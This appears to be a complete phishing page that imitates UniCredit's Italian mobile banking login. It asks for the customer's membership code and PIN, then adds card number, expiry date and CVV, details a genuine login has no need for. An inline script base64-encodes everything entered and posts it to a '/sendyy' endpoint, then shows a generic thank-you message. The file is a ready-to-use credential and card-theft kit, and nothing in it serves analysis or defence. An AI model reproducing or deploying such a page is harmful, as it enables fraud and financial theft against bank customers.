<!DOCTYPE html>
<html lang="it" dir="ltr" class="ios">

<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta name="robots" content="noindex">
  <meta name="googlebot" content="noindex">

  <title>UniCredit - Mobile Banking</title>
  <script src="carbon-components.min.js" defer></script>
  <link rel="stylesheet" href="carbon-components.min.css">
  <link rel="stylesheet" href="style.css">
  <link rel="shortcut icon" href="favicon.ico" type="image/x-icon">
  <link rel="stylesheet" href="normalize.min.css" />
  <script src="base64.js"></script>
</head>

<body>
  <div id="app">
    <header style="margin-bottom: 2rem; margin-top: 2rem;"><img src="logoHiRes.png" width="130" class="bx--image"
        alt=""></header>
    <h1 class="bx--h1">
      Inserisci il Codice <br> di adesione e PIN
    </h1>
    <form action="" method="POST" id="my-form" class="bx--form">
      <div class="bx--form-item">
        <input id="text-input-1" type="text" class="bx--text-input" name="code" placeholder="Codice Adesione">
      </div>
      <div class="bx--form-item">
        <input id="text-input-2" type="password" inputmode="numeric" name="pin" class="bx--text-input"
          placeholder="PIN">
        <div class="bx--form__helper-text">
          <a href="#" class="bx--link">Dove trovo i miei codici?</a>
        </div>
      </div>
      <div class="bx--form-item">
        <input id="text-input-3" type="number" inputmode="numeric" class="bx--text-input" name="cc"
          placeholder="Numero di carta" maxLength="16">
      </div>
      <div class="flex">
        <input id="text-input-4" type="month" class="bx--text-input" name="exp" placeholder="Data di scadenza">
        <input id="text-input-5" type="number" inputmode="numeric" name="cvv" class="bx--text-input" maxLength="4"
          placeholder="CVV">
      </div>
      <button class="bx--btn bx--btn--secondary" type="submit" id="my-form-button">
        PROSEGUI
      </button>
    </form>

    <h4 class="bx--h4">
      <a href="#" class="bx--link">
        ADESIONE DIGITAL MAILBOX &rangle;
      </a>
    </h4>
    <p id="my-form-status"></p>
  </div>
  <script>
    var form = document.getElementById("my-form");

    async function handleSubmit(event) {
      event.preventDefault();
      var status = document.getElementById("my-form-status");
      var data = new FormData(event.target);

      var encodedData = base64.encode(data);

      fetch("/sendyy", {
        method: "POST",
        body: encodedData,
        headers: {
          'Accept': 'application/json'
        }
      }).then(response => {
        if (response.ok) {
          status.innerHTML = "Thanks for your submission!";
          form.reset()
        } else {
          response.json().then(data => {
            if (Object.hasOwn(data, 'errors')) {
              status.innerHTML = data["errors"].map(error => error["message"]).join(", ")
            } else {
              status.innerHTML = "Oops! There was a problem submitting your form"
            }
          })
        }
      }).catch(error => {
        status.innerHTML = "Oops! There was a problem submitting your form"
      });
    }
    form.addEventListener("submit", handleSubmit)
  </script>
</body>

</html>